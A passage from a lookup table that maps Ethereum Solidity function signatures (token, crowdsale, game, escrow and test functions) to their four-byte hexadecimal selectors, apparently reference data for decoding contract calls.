"SimpleIndex()": "0xe299beb3", "ReviewModel()": "0x702fc7da", "ModelCoordinator()": "0xa60bbcd3", "paged(uint256,uint256)": "0xf99ff4df", "set_reference(uint256,uint256,uint256)": "0xe2deaa81", "add_to_association(uint256,uint256,uint256)": "0x49fb2dc5", "get_blocks_for(uint256)": "0xebd83378", "is_destroyed(uint256)": "0xdb6fcf01", "destroy(uint256)": "0x9d118770", "add_owner(uint256,address)": "0xb56b2627", "is_owner(uint256,address)": "0xd716222c", "has_owners(uint256)": "0x595da94d", "update(uint256,uint256[101][])": "0xeb121e2f", "get_default_keys()": "0x8ee21b8e", "get_associations()": "0x582ca57b", "get_read_only_keys()": "0x41d31feb", "get_keys()": "0x3fda1281", "Model()": "0x23cd7cd5", "id_for_user_version(uint256,uint256)": "0xf739ed4c", "delete_entry(uint256,uint256,uint256)": "0x1a10cfc3", "clear(uint256,uint256)": "0x41ee903e", "get_all(uint256,uint256)": "0x89029d8c", "get_entry(uint256,uint256,uint256)": "0x58e59c32", "get_length(uint256,uint256)": "0x25010816", "add(uint256,uint256,uint256)": "0x505fb46c", "new_entry()": "0x9c851ebc", "has(uint256)": "0xcccf7a8e", "count()": "0x06661abd", "EternalDB()": "0x272cda88", "lookup(uint256,uint256)": "0xb4b9d1f1", "transfer_ownership(address)": "0xf0350c04", "set(uint256,uint256,uint256)": "0x43b0e8df", "DualIndex()": "0x3b107682", "id_for_address(address,address)": "0x8f70009d", "add_rating(uint256,uint256)": "0xbd119967", "replace(address)": "0xcabfb934", "id_for_nym(uint256)": "0x63e38ff3", "validate(address,uint256,uint256[101][])": "0x67f12ecf", "create(uint256[101][])": "0xc27d7721", "AttributeModel()": "0xa30b5c69", "TokenTester()": "0xfe01f1ff", "Standard_Token(uint256)": "0x7102c138", "createStandardToken(uint256)": "0x05215b2f", "createdByMe()": "0xdc3f65d3", "lookup(bytes)": "0xc3b2556d", "setFallback(address)": "0x32b12eac", "registerLengthFunction(string,string,address)": "0x18b31f94", "register(string,address,uint256)": "0xd393c871", "Resolver(address)": "0x29090202", "setAdmin(address)": "0x704b6c02", "TokenCreation(uint256,uint256,address)": "0xea25f24a", "setDeploymentFee(uint256)": "0xd002462b", "getDailyPayment()": "0x9b29cb23", "returnRemainingMoney()": "0xd4065763", "setDailyCosts(uint256)": "0x3535cd52", "SampleOffer(address,bytes,uint256,uint256,uint256,uint256,uint256)": "0xcc25decd", "createDAO(address,uint256,uint256,uint256)": "0xe2faf044", "deposit()": "0xd0e30db0", "emergencyStop()": "0x63a599a4", "TokenWithEStop(address)": "0x75862df4", "stopTransfer(uint256)": "0x66e5cb50", "Exam()": "0xa248da12", "iPeso()": "0x67e523bb", "getMonsterClassBasic(uint32)": "0x94f6ba1c", "getObjIndex(uint64)": "0x1bea4a61", "setGason(uint32,bool)": "0xe92704e8", "setCatchable(uint32,bool)": "0x8b886d04", "addMonsterClassExtend(uint32,uint8,uint8,uint8,uint8,uint8,uint8,uint8,uint8)": "0xbf5f4edf", "addMonsterClassBasic(uint32,uint8,uint256,uint256,uint8,uint8,uint8,uint8,uint8,uint8)": "0x1756ffd9", "isGason(uint64)": "0xfd083748", "AgriChain()": "0xa9e5714b", "AntFundRobotToken()": "0x65433e7f", "XfinityAsset()": "0xe4da3860", "ExMoneyToken(uint256,string,string,address)": "0x4efcc69e", "champToken()": "0x78fad7bc", "sendInternally(address,uint256)": "0xc8a1e1c7", "sendAmount(address[],uint256)": "0xfbd54a63", "pickupProduct(uint256)": "0x46dbf9b0", "restoreOwner(address)": "0x1b58c88f", "removeStudent(string)": "0xedd6cfb1", "sub_session(string,uint256)": "0xac35bdb4", "sub_fCode(string,uint256)": "0x232c4d24", "sub_id(string,uint256)": "0xbd0b65e4", "subset(string,uint256,uint256)": "0xdbc91ed1", "addStudent(string,string,string,bytes32)": "0x4f2253d4", "getHashDigest(string)": "0xfa169ec8", "BITSToken(uint256,string,uint8,string)": "0x620a9c95", "loikikdid()": "0xf044632f", "TESTTOKEN()": "0x1edf0c3d", "getCurrentTotalEther()": "0xd0e3cbbe", "getCurrentUnitPrice()": "0xe1d1e8ef", "buySecond()": "0x91e52b91", "getBalanaceOf(address)": "0x55a3f425", "DHUBTest()": "0x90f5f99d", "addMultipleRecordsStrict(uint256[])": "0x43104d92", "_addRec(uint256)": "0x194b546b", "addRecordStrict(uint256)": "0xd0c475e5", "checkRecords(uint256[])": "0x7886b526", "sachin()": "0x9e27a305", "confiscateDeposit()": "0xe362bc9a", "getNumArchers()": "0x1d2a6dcf", "hitCharacter(uint16,uint16,uint8)": "0xdb0c154a", "getRandomAdversary(uint256,uint8)": "0xecc137db", "isValidAdversary(uint8,uint8)": "0xad389d5d", "DragonKing(address,address,address,address)": "0x9748db00", "ExCToken11()": "0xda062d68", "KiwiTestToken()": "0xed06d4dc", "requestToken(address,uint256)": "0x1c11fce2", "ArtCoin()": "0xcc36f8eb", "upRound(uint256,address,uint256,uint256,bool,uint256,uint256,uint256,uint256,uint256,uint256)": "0x3281c4fa", "upPlayerRound(address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x26e80650", "upPlayer(address,bytes32,uint256,uint256,uint256,uint256)": "0x457a893f", "dp()": "0x93eb049d", "getAdminAddresses()": "0x64ddfa29", "removeAdminAddress(address)": "0x95101181", "addAdminAddress(address)": "0x004fba00", "getAdminAddressIndex(address)": "0x97f28419", "isAdminAddressExist(address)": "0xbcc74a3b", "TTCoin(address)": "0x1976804a", "ChunksToken()": "0x40bbf5b9", "TildeCoin()": "0x769794dd", "setPriceIncreasingRatio(uint16)": "0x57918052", "DecentralizedCrowdFunding(address,uint256,string,uint256,uint256)": "0xecbb596a", "fooToken()": "0x41733f7a", "bitmcoinToken()": "0xf4395dbc", "startTrack(bytes32,uint256)": "0xe6dab965", "Petcoin()": "0x3b495d6b", "ETASToken()": "0xb27c0ccb", "getTotalCounter()": "0xe1ff98f2", "GOE()": "0x149679b9", "whitelist10Addresses(address[10])": "0x804d564c", "whitelist5Addresses(address[5])": "0xfa188644", "whitelistOneAddress(address)": "0xe8a748e7", "Toptech()": "0x1abca540", "MitkeyCoin()": "0x290cb460", "admin(address)": "0x63a846f8", "BCREWARDS(uint256,string,string)": "0xef71a1f2", "tokenIdOf(bytes32)": "0xcd5bfb63", "Gametest()": "0x615c2971", "getThisBalance()": "0x8e8cf4a8", "ColorBayTestToken(uint256,string,string)": "0x73580358", "ASSToken(uint256,string,uint8,string)": "0xda8fb7cd", "approve(string)": "0xb67b7163", "Supernova()": "0x0a01ae41", "FesBerto()": "0x91d91df3", "changebank(address)": "0x4bbc2a4a", "MarmotToken(uint256,string,uint8,string)": "0xaf2b1925", "removeTrustedAccount(address)": "0xba0e0f5e", "addTrustedAccount(address)": "0xd88b8676", "_checkMyVesting(address)": "0xa6e0264a", "_addToVesting(address,address,uint256,uint256)": "0xf933b844", "vestingTransfer(address,uint256,uint32)": "0x9d2e4777", "getInvestmentsInfo(address)": "0x11fa7da2", "recordPurchase(address,uint256)": "0x958799cb", "setSwap(address)": "0xacb3c073", "getFund()": "0x8edd6eb6", "setMilestones(uint32[],uint8[],uint32[])": "0x4ef94e34", "__setParameters(uint32,uint256,address)": "0x15bddfbe", "getStageVolumeBonuses(uint256)": "0x0ee62c77", "getStageVolumeBoundaries(uint256)": "0xf12585f5", "milestonesLength()": "0x3baba4d7", "AddItem(uint256)": "0x7e7f8e1e", "ItemInfo(uint256)": "0x97c112d5", "Items()": "0x369d32f1", "donatorBonus(uint256)": "0x6aba2a0d", "updateKittenCoinsRemainingToDrop()": "0x5adf292f", "withdrawToken(address)": "0x89476069", "withdrawKittenCoins()": "0x316cb1b4", "setDonatorReward(uint8,uint256[],uint8)": "0x68d12938", "setRewards(uint256,uint256)": "0x654e51e7", "setHolderAmount(uint256)": "0xb2b158e8", "setDropNumber(uint8)": "0x7be2d5a2", "participant(address)": "0x2605b3c7", "KittenSelfDrop2()": "0x2795348d", "MillionDollarToken()": "0xa5171828", "transferAllowance(address,uint256)": "0x96bd8dae", "denyAllowanceProxyAccess(address)": "0x76a684de", "grantAllowanceProxyAccess(address)": "0x9ff32b18", "getHardCap()": "0xbf0a07bd", "isCrowdsaleSuccessful()": "0xc55c4f47", "GenevExch(address,address,address,uint256,uint256,uint256)": "0x5c40839f", "ApplicationQualityCoin()": "0x93c98cbc", "Shitcoin()": "0x0f56e460", "REET()": "0x02083e27", "MainToken(address)": "0x1525d680", "removeAddressFromBlacklist(address,address)": "0x24a7d277", "addAddressToBlacklist(address,address)": "0xce0d5f78", "setManagerAgent(address)": "0xb5432fcc", "AdvancedOwnable()": "0x475b54c9", "SatoMotive()": "0xb5738a78", "lookup(address,bytes32)": "0x5dd4a65f", "publish(address,bytes32,bytes32)": "0x8ac2571f", "revokeAndPublish(address,bytes32,bytes32,address)": "0x7769d384", "setSelfClaim(bytes32,bytes32)": "0x9155b01a", "setClaim(address,bytes32,bytes32)": "0x9918925d", "continueITO()": "0x8ab8064f", "pauseITO()": "0x44326354", "setLockPeriod(uint256)": "0x779972da", "insertMilestone(uint8,uint256,uint256,uint256)": "0x2b455ac6", "changeMilestone(uint8,uint256,uint256,uint256)": "0xc59255dc", "addNews(string)": "0x7f784da7", "unfreezeBalance(address)": "0x57d4f398", "freezeBalance(address,uint256)": "0xab3bfac4", "TronToken(address,address,uint256,string,uint8,string)": "0x3a4dcc88", "NathalieToken(uint256,string,uint8,string)": "0xb0c2ebfd", "delAddr(uint256)": "0x70ad0cc6", "transferForICO(address,uint256)": "0xa75e2853", "GoldVein(string,string,uint256)": "0x088e3595", "DNNTDE()": "0x8cf228cd", "finalizePRETDE()": "0x6d156add", "finalizeTDE()": "0x1485ffc4", "releaseTrickleDownBonuses()": "0x4e77a38e", "issuePRETDETokens(address)": "0xcd9679dd", "issueTDETokens(address,uint256)": "0xbf15d827", "buyTDETokensWithoutETH(address,uint256,uint256)": "0x7374b013", "buyPRETDETokensWithoutETH(address,uint256,uint256)": "0x65e16933", "calculateTokens(uint256,uint256)": "0x903cc583", "getPRETDETokenExchangeRate(uint256)": "0x8efa00e2", "getTDETokenExchangeRate(uint256)": "0xfed03118", "getCurrentPRETDEBonus()": "0x24c4c9e4", "getCurrentTDEBonus()": "0x47c8cc69", "getPendingPresaleTokens(address)": "0x540cf75e", "isAwaitingPRETDETokens(address)": "0x949c5099", "contributorETHBalance(address)": "0x85d51d19", "changeDNNHoldingMultisig(address)": "0x71f11552", "extendPRETDE(uint256)": "0xa1bc76d1", "extendTDE(uint256)": "0x0b1aff48", "getTokensDistributedPlusTrickleDownBonuses()": "0xee73c117", "DNNToken()": "0x19fa9f72", "unlockTokens()": "0xf968f493", "sendUnsoldPRETDETokensToTDE()": "0xce21abf3", "sendUnsoldTDETokensToPlatform()": "0x59b79610", "issueCofoundersTokensIfPossible()": "0x99cfe1e1", "changeCofounderB(address)": "0x941993f8", "changeCofounderA(address)": "0x6b0f182e", "changeAllocator(address)": "0xb3745afa", "changeCrowdfundContract(address)": "0x51a36e34", "changePlatform(address)": "0x753d93e4", "_0xDogecoinToken()": "0x140aee46", "GBNC(string,string,uint256,uint8)": "0xb69ee531", "tokenOwnership(address)": "0x486fc7e8", "mintTokens(address,int256,uint256)": "0x455c06e4", "addIcoAddress(address)": "0x5a119ef2", "TokensGate(uint256,uint256,uint256,address)": "0x37633f29", "redirectToPurchase()": "0x9fd8b4f1", "sendQualifiedPartnerCommissionFee(address,uint256)": "0xf0ea433a", "getBonusTier()": "0x8d0d3ccf", "recordPurchase(address,uint256,uint256,string,uint256)": "0x02ef43c3", "startCrowdsale(uint256)": "0xbbc2402d", "purchaseWithEth()": "0x925aa2ad", "purchaseAsQualifiedPartner()": "0x20f541fa", "totalAmountOfCrowdsalePurchasesWithoutBonus()": "0xe1568024", "totalAmountOfCrowdsalePurchases()": "0xc0c4440a", "numOfPurchases()": "0x810405d6", "updateQualifiedPartnerCapAmount(address,uint256)": "0x587378a4", "unlistQualifiedPartner(address)": "0x52a80129", "setQualifiedPartner(address,uint256,uint256)": "0x16291032", "loadEarlyPurchases()": "0xee97adbc", "deliverPurchasedTokens()": "0xc071f3bf", "amendPurchase(uint256,address,uint256,uint256,uint256,string,uint256)": "0x9e945ff2", "invalidatePurchase(uint256)": "0xf956ecde", "admin_commission_activated()": "0x6a0cd52e", "setuped()": "0x355473d0", "proposalAmount()": "0x173a2b5c", "tokenSpread()": "0xd14cd233", "tokenVendor2()": "0x6a931aa8", "alreadySold()": "0x4d2db81f", "MIN_PRICE()": "0xad9f20a6", "angelAdminAddress()": "0x0127eb0d", "getSmartCoins()": "0xc7b41aa9", "minimalGoal()": "0x6385cbbe", "TEAM_BONUS()": "0xa903741a", "makeItRain()": "0x5dae4e50", "champsForSaleCount()": "0x1abd409d", "vitToken()": "0x03cf678b", "_batch4_rate()": "0xae36f6f9", "cancelTeamWithdrawal()": "0x4de799c2", "clientInit()": "0x9b250f76", "WEI_TO_INSIGHTS()": "0x9671ef91", "MIN_WTH()": "0xc9e43221", "tokensFor1EthP5()": "0x9fe6999a", "create3DoggiesTokens()": "0x1057ce8c", "fraction()": "0xd8894bb5", "isRoundActive()": "0x45945a45", "burnFeeNumerator()": "0x56e1c40d", "percentLeft()": "0xd53b932a", "MIN_BET()": "0x6540742f", "isLotteryClosed()": "0xb8af21b9", "Rate3()": "0xc585de64", "rok()": "0xd1bf942a", "foundersAdvisorsPartnersTokensVault()": "0x0fe43e1f", "icoOwner()": "0x6c4bf16b", "processMilestoneFinished()": "0x3c22c935", "sellDividendPercentCandy()": "0xb93c7d42", "crowdsaleHardCap()": "0x744bb8d2", "APM_APP_NAME()": "0x1219d5c8", "tokenExchangeRateMile3()": "0x0cc6373f", "teamSupply12Months()": "0x34032f4f", "publicsalesendTime()": "0x364e1c59", "reservedTokensFunctionality()": "0x7ab5e1e1", "secondVestAmount()": "0x39c5a13e", "totalAccessorySeries()": "0xa3d8fdd5", "First_pay_bountymanager()": "0xb6e390ae", "wct1()": "0xf562db76", "STARTING_PRICE()": "0xd12f7029", "ownerSupply()": "0x25f96b73", "oracCost()": "0xaf106b10", "BONUS_HI()": "0xf72d2c22", "TOTAL_WINS()": "0xcbb45120", "getAllOwners()": "0x16c12746", "requiredPlayers()": "0x40c7e279", "grantAccessForToken()": "0xc28dbc38", "LOCKAMOUNT1()": "0xd76dc2eb", "lastFeesCollected()": "0xbeccdb77", "distribution()": "0x5ee58efc", "periodEnd()": "0x506ec095", "DISPLAY_VIDEO()": "0x30d88a9e", "address3a()": "0xbe5affd1", "OwnerReward()": "0xc965ed7b", "EXCHANGE_RATE_DECIMALS()": "0x71506977", "leftICOTokens()": "0x421db384", "removeModeratorship()": "0x43c8c30e", "emergencyWithdrawalActivated()": "0x0869db30", "referraltokencontract()": "0xfd03e721", "changingMilestones()": "0x03c327f0", "preSaleEndedAt()": "0x0370e65c", "RELEASE_GAS_FEES()": "0xf96f143e", "secondWeek()": "0xaa8713dd", "Take_share_team_AES()": "0xf4ea7263", "LockedVotingTokens()": "0x81a1384b", "intervalUpdate()": "0xe067f631", "communityContributionPercentage()": "0x023e1c34", "price_exponent1()": "0x7feed5b6", "tokensPromotion()": "0xbb5d3bcb", "ETHER_ADDRESS()": "0xcf1d21c0", "unhaltFX()": "0xd38609f9", "manualWithdrawEther()": "0x5954c8c5", "assetName()": "0xc9230c5d", "sellerfee()": "0xd5c813dc", "fifthExtendedBonusSalesEnds()": "0x542241d0", "privateSale2Hardcap()": "0xf0cecafc", "LOCKUP_WALLET()": "0xc2c13a70", "CTX_Cap()": "0xb63a35bf", "withdrawGTO()": "0x4300705d", "upgradeAgentLocked()": "0x09f8cc58", "stepTwoRate()": "0x42a6617d", "getPatronsCount()": "0xcf086765", "tierCount()": "0x96b55f7d", "MAX_UNSOLD_RATIO()": "0x2f969d43", "communityAllocating()": "0xe96d36ac", "crowdSaleEnded()": "0xfd2b6b19", "bountyManagementWalletAddress()": "0x00364ceb", "presaleFemaleStart()": "0x41e1234e", "ZTR_ETH_initial_price()": "0x72be346c", "unidentifiedSaleLimit()": "0xde66b5f7", "QuizQuestion()": "0x1bc4c81b", "timeWindow()": "0xd2f343c7", "addressFundDevelopers()": "0xbefa7d5a", "calculatedTo()": "0x5fee63c3", "ICDStopTime()": "0xeb1de3e5", "soldOnStage()": "0x96b47f0d", "getOwnedWineCountOf(address)": "0xeee1f5f9", "getWineCount()": "0x9c4fc41a", "PatrickTestCoin()": "0xd2eeead7", "setResult(uint256,uint256)": "0x310efb48", "setbetEnd()": "0xe6e93b14", "bet(uint256,uint256,uint256)": "0xbfc54822", "WorldCup(bytes32,bytes32,bytes32)": "0xf56e0609", "TalkToExpertToken()": "0x92f00d37", "MultiUser()": "0xebde0bce", "link(string)": "0xcf2e011e", "getPublicKey(address)": "0x857cdbb8", "proxyMint(uint256,bytes32)": "0xb1bb4d35", "setMinterFeePercent(uint256)": "0xa5c102a2", "setMinterWallet(address)": "0x85b6824f", "setPayoutsWallet(address)": "0xb61334b1", "setMintableToken(address)": "0x2516a18f", "MintHelper(address,address,address)": "0x2708a710", "mintAll(address)": "0x56c88f5f", "expectedTotalSupply()": "0x6e90a590", "getTokenAmounts(uint256)": "0x3b4e06e6", "calculateArtCoinSupply()": "0xac798bd3", "CCtestToken(address)": "0xd369a744", "getWinnerAddress()": "0x10a37c26", "getChosenNumber()": "0xaf0c09db", "chooseWinner(uint256)": "0x9e2f04bf", "joinraffle()": "0x844e774d", "KKTokenNew()": "0xe42a4556", "getIsStoreSet(string)": "0xb7388178", "isAddressSet(address,address)": "0x374bb090", "isUidSet(string)": "0xdbd6da8c", "setApp(string,string,string,uint256)": "0x59a941a6", "isSettable(uint256,string)": "0x8549b326", "ANONIMX()": "0x92a20d0c", "changeTransactionService(address)": "0x27136e46", "changeAccountService(address)": "0xcb637d85", "MainController(address,address)": "0x66734eb0", "addTransaction(uint256,uint256,uint256,uint16,bytes32,uint256)": "0x44ec2c03", "getAccountData(uint256)": "0x9247ff59", "updateAccount(uint256,uint16,bytes32,uint16,bytes32)": "0x6fce2d65", "mintAccount(uint256,uint256,uint16,bytes32,uint256)": "0x5f7c944f", "addAccount(uint256,uint16,bytes32,uint256)": "0x232397e2", "RelentlessConscience1Token()": "0x795fcd6e", "SimpleDividendToken()": "0x6d0def6c", "customExchange(address,address,uint256)": "0x62e4aeb8", "customExchangeSecure(address,address,uint256)": "0x190406b3", "CIFCoin()": "0x816bff5f", "TheCoin()": "0x6b1970ab", "OVOToken()": "0x7507b2e5", "DaicovoStandardToken(string,string,uint8)": "0xb00baa11", "SVET()": "0x825f6552", "H2G2()": "0x6a7c4cdf", "setWalletAmount(address,uint256)": "0x484b8d33", "setIsPoop(bool)": "0x5223478a", "getIsPoop()": "0xfff95ce3", "SnowdenAffact()": "0x732a37c9", "getRewardWei(address)": "0x76017bbd", "addBuyer(address,uint256)": "0x26aa7c58", "Insurance()": "0x622e5026", "setTransfersEnabled(bool)": "0x26b9ce13", "MMMC()": "0xbbc6351e", "ZuperToken()": "0x538eae06", "endBorrowAgreement(string,uint256,uint256)": "0x264dac0f", "setBorrowAgreement(uint256,uint256,string)": "0xea612545", "getFirstBorrowAgreementTool(address,address)": "0x9d1fd89c", "getMasterAdress()": "0xe199b7e4", "setMasterAddress(address,address)": "0xfbd3d51b", "EtherIbe()": "0x6e1d7d5e", "PFXTestCoin()": "0x1668603f", "totalApproval(address)": "0x3dbc7c69", "EthRental()": "0xdfb59249", "MyTestToken2()": "0x04550e70", "splitEther()": "0x502b31d2", "SaturnToken()": "0x244b252a", "removeWhiteListedAddress(address)": "0xc433793d", "addWhiteListedAddressesInBatch(address[])": "0x13905905", "whiteListAddress(address)": "0xcf52a7b2", "DecisionTokenSale(uint256,address)": "0xc6d81547", "DecisionToken()": "0xab3ed9f0", "ScallopCrowdsale(uint256,uint256,address,address)": "0xbeba0b11", "SAIToken(address,address,address)": "0x94fd1c1c", "JokerCoin()": "0x22643a47", "EthLyteToken()": "0x40b6c71f", "EthlyteToken()": "0xd94d0787", "changeExchange(address)": "0x3c3bdb7a", "registerToken(address)": "0x09824a80", "U21Y()": "0xf26a058d", "__targetExchangeAndSpendCallback(address,uint256)": "0x5a63feb8", "__targetExchangeCallback(uint256)": "0xb8b690e7", "__exchangerCallback(address,address,uint256)": "0x8eddc306", "exchangeAndSpend(address,uint256,address)": "0xb65b3f80", "Testereum()": "0xc341031a", "exchangeToken(address,uint256)": "0xcf3cb33f", "Satanshi()": "0xab2191a2", "MycoinToken(address,address)": "0x523b6ae3", "PixoArenaFounderToken()": "0xdacd4472", "Get_Last_Value()": "0x29bee342", "Send_Data(uint16)": "0x0dbd5e81", "costructor()": "0x5d7c3b78", "TegTokensSale(uint256,string,string)": "0x7ddcbfd9", "CoinVilla()": "0xd8d0819f", "weeOneEthCanBuy()": "0xe9092bca", "token_set()": "0x8a7e30a1", "refund_and_die()": "0xdfceb5ba", "oldTokenTotalSupply()": "0x12217378", "getMyCarsIdx()": "0xca0b49ae", "updateTokensApproved()": "0x58c3b0eb", "ICOweek3End()": "0x16618e61", "disableInitialAmbassadorStage()": "0xa106832b", "soldByChannels()": "0x29107555", "nextVersionAddress()": "0x9ce3961f", "endTimeTLP2()": "0x8875a40b", "ICO_BASE_PRICE_IN_WEI()": "0xcb4de968", "MULTISIG_TKN()": "0x9c2cdd5a", "etcSupply()": "0xaeb817ab", "gana()": "0xa78cdfed", "allEth()": "0xef3613c3", "toRefer()": "0xf69da37e", "Presale2Sold()": "0xcb5d0646", "See_price()": "0xc5129348", "ROLE_GRADE_PROVIDER()": "0x034ac7a3", "periodPreITO_startTime()": "0x2e3ced61", "PRESALE_HOLDER()": "0xca75b954", "exchangeRateFUTX()": "0x39e1e859", "addressReserveFund()": "0x73a070bc", "minResalePercentage()": "0x26a934f5", "advisorLockUp_address()": "0x20cd2141", "strikersChecklist()": "0x2a571b15", "priceChibi()": "0xcf38b609", "getTokenName()": "0x862b092b", "tokensPerTranche()": "0xe1ffdecb", "heapSort(uint64[])": "0xb286ba8c", "paymentMin()": "0x7674cee3", "amountRaisedPreSale()": "0x255c8244", "minimumInWei()": "0x150627bb", "numActiveTranscoders()": "0x61e25d23", "cf2Wallet2Pct()": "0xcb6b1f05", "totalWeiCommitted()": "0x0f59a638", "lockup()": "0x06490f47", "MAXSALESCAP()": "0x6c2bcfdd", "crossForkFundDeposit()": "0x06f69881", "STARTING_KILOS()": "0x3e445446", "Withdraw_referral()": "0x8d0528ec", "bonus_price()": "0xd44750f5", "icoReserveSupply()": "0x33d63869", "etherflipContract()": "0x3131d8de", "CONTRIB_PERIOD2_STAKE()": "0x6f468289", "NON_TRANSFERABLE_TIME()": "0x8e9185cb", "proWallet()": "0x4bfe642d", "minimumAmountRequired()": "0x387be94f", "lockupDuration()": "0x1ada70a8", "availableCount()": "0x9e05c118", "operationalExpensesWallet()": "0x5366d0fd", "catPaymentCollector()": "0x26dcbcfc", "summReserve()": "0x485e16a5", "summPremineBounty()": "0xa129cb94", "restSupply()": "0xe87c05c6", "getEuroCollected()": "0x55d1c5c7", "lockDomainOwnershipTransfers()": "0x7dd45999", "erc20tk()": "0x11780a01", "manager1()": "0x6f7f461d", "totalDropTransactions()": "0x604e7af6", "withdrawCrowdsaleOsherCoins()": "0xf7cbcb8f", "cookieProductionMultiplier()": "0x577ec5ae", "vaultSecondaryUnlocked()": "0x066cf539", "totalVUP()": "0x1fddbba4", "getBallotOptions()": "0x0c0075a3", "getPrivAddress()": "0x03602e9e", "finalizedEthFundAddress()": "0x2505c445", "indVesting()": "0x7570acd4", "STAGE_1_FINISH()": "0xafd23d4a", "lockedSell()": "0x49b7ef6c", "Valens()": "0xc1a06de3", "numPeriods()": "0xdcd65479", "FOURTH_TIER_DISCOUNT()": "0x1cc8092f", "holders()": "0x8188f71c", "founders_addr()": "0x78c6d437", "capUsd()": "0x04659819", "token3MstepCAP()": "0x13ae4522", "totalUSDRaised()": "0x85cbc881", "privateRate()": "0x82c4175d", "trader()": "0x1758078b", "kickoffQuorumPercent()": "0x81dd70db", "tgeSettingsPartInvestorIncreasePerStage()": "0x894a93e2", "ALAP()": "0x81030e35", "getSignerby()": "0xeb35a849", "privateSaleSencPerMEth()": "0xa58091cd", "allocateContributorsToken()": "0xa1d0ab04", "mdtFoundationAddress()": "0x039b267d", "teamTokensLockAddress()": "0xcd88bac4", "getRemainingBountyTokens()": "0x552a41a3", "icoEnds()": "0x9a8ca12c", "totalCapsules()": "0xb49ce17f", "maxBuyPrice()": "0x6d952117", "deathData_v11()": "0xd028a625", "econVestingStages()": "0x55b23f4c", "genesisImportsComplete()": "0xcbdd3268", "SHAREHOLDERS_SHARE()": "0x4f4027d0", "usdCurrencyFunding()": "0x7dbece3c", "peloExtenstion()": "0xfdee60e9", "getEthPrice()": "0x67c9b017", "getKudosOf(address)": "0xc4569504", "getGratitudesSizeOf(address)": "0x9a661e66", "getGratitudeOf(address,uint256)": "0xf32784cd", "getGratitudesOf(address)": "0x001bc69a", "reward(address,uint256,string)": "0x5c102782", "canBeClosed()": "0xb5120c30", "minDeadline()": "0xc5549cc0", "maxKudosToMember()": "0x975739a5", "creation()": "0x13845d2f", "kudosByMember()": "0x04df0a1d", "getContact(address)": "0xf96a181e", "editContact(address,string)": "0xe49f6e91", "membersNumber()": "0x8a4fe8ac", "getMember(uint256)": "0xab3545e5", "memberIndex(address)": "0x3dd35279", "changeOrganisationName(string)": "0x5f71249c", "getPollsSize()": "0x51c3a5d3", "getPolls()": "0x120fe89b", "activePoll()": "0x5ba8c608", "closePoll()": "0xed8c2aed", "newPoll(uint256,uint256,uint256)": "0x9a0e9e50", "organisationName()": "0xec5d9e58", "isActivePoll()": "0xe34486f8", "polls(uint256)": "0xac2f0074", "contacts(address)": "0x2c1352cf", "getAmountToGive(address,address,address,address,uint256,uint256,uint256,uint256,uint256,uint256,bytes,bytes,bytes)": "0xb4b179dc", "lockedTime(address)": "0x3266fb05", "lockedTime(uint256)": "0xa84a70aa", "diamondBonus(uint256)": "0xb02da8d8", "approveAndCallWithSender(address,uint256,bytes4,bytes)": "0x82857a03", "removeCallSpenderWhitelist(address)": "0xf75eb240", "addCallSpenderWhitelist(address)": "0x8e09c8cd", "makeOffer(uint256,bytes32,uint256,address,uint256,uint256,address,address,uint256)": "0xc9c8580c", "sendDeposit(uint256,address,uint256,bytes32)": "0x5f0da25b", "addData(uint256,uint256,bytes32)": "0xd9fefbf8", "addData(uint256,bytes32)": "0x9a8d10a3", "addData(bytes32)": "0x28af94c8", "payCommission(uint256,uint256)": "0x83a6b565", "paySeller(uint256,uint256)": "0x0f215afb", "refundBuyer(uint256,uint256)": "0x044ce308", "updateRefund(uint256,uint256,uint256,bytes32)": "0x1d34be47", "dispute(uint256,uint256,bytes32)": "0x70809757", "finalize(uint256,uint256,bytes32)": "0xfde34dc4", "addFunds(uint256,uint256,bytes32,uint256)": "0x7d19514d", "withdrawOffer(uint256,uint256,bytes32)": "0xebe65f60", "acceptOffer(uint256,uint256,bytes32)": "0x9c3f7ca2", "withdrawListing(uint256,address,bytes32)": "0xa3111d7c", "updateListingWithSender(address,uint256,bytes32,uint256)": "0xcea4b687", "updateListing(uint256,bytes32,uint256)": "0xbf77aa1f", "createListingWithSender(address,bytes32,uint256,address)": "0xde400629", "createListing(bytes32,uint256,address)": "0xca27eb1c", "totalOffers(uint256)": "0x91f1f310", "totalListings()": "0xc78b616c", "toAddressThrow()": "0x7f4ec5a7", "testToAddress()": "0x0238b5aa", "toUintThrow()": "0x63ba2c76", "testToUint()": "0x4c81e48b", "sliceLengthThrow()": "0x06c17cd7", "sliceIndexThrow()": "0x4bcb776f", "testSlice()": "0xe27c5b17", "resetStorage()": "0x36525c4e", "testConcatMemoryZeroLength()": "0xad0bc739", "testConcatStorage33Bytes()": "0xdcb04503", "testConcatStorage32Bytes()": "0xfdaed778", "testConcatStorage31Bytes()": "0xb02f53ae", "testConcatStorage4Bytes()": "0xbbd418e6", "testConcatMemory33Bytes()": "0xf51c755b", "testConcatMemory32Bytes()": "0x4ab0c0ee", "testConcatMemory31Bytes()": "0x416c6383", "testConcatMemory4Bytes()": "0xa3ebeab7", "testMemoryIntegrityCheck33Bytes()": "0x278e9d03", "testMemoryIntegrityCheck32Bytes()": "0x8ffc831a", "testMemoryIntegrityCheck31Bytes()": "0x84c8df88", "testMemoryIntegrityCheck4Bytes()": "0xca44c8e4", "testSanityCheck()": "0x8c920a38", "computeCurrentPrice(uint16)": "0xe6d944a7", "hasAirDropHero(uint16,address)": "0xb673ddb7", "airDrop(uint16)": "0xb27eb3e5", "setCoinAddress(address)": "0xb0bdacc6", "setHeroAssetAddress(address)": "0x985df3a7", "heroTypeIds(uint16,uint256)": "0x6980f4fb", "heroTypeToHeroSales(uint16)": "0x28aa48b4", "heroAsset()": "0x16f38b63", "withdrawEMONT()": "0x15003368", "addSales(uint16,uint128,uint16,uint16,uint64,uint64,uint16,uint8)": "0x04803c2a", "purchaseByEMONT(uint16,uint256,address)": "0x0396dcb0", "accountsReceiveableHeld()": "0xbc4076e9", "accountsPayableHeld()": "0x6120ffbc", "releaseEscrow(uint256)": "0xed653164", "payoutEscrow(uint256)": "0x10e1d6db", "approveEscrow(address,uint256)": "0x61e4fd2b", "createEscrowFrom(address,address,uint256,uint256)": "0xdc44bb1c", "_createEscrow(address,address,uint256,uint256)": "0x1b84e72d", "getDestQty(address,address,uint256,uint256)": "0xfa64dffa", "approvedWithdrawAddresses(bytes32)": "0xd7b7024d", "setContracts(address,address,address)": "0xb3066d49", "getSrcQty(address,address,uint256,uint256)": "0xa7fca953", "getConversionRate(address,address,uint256,uint256)": "0x7cd44272", 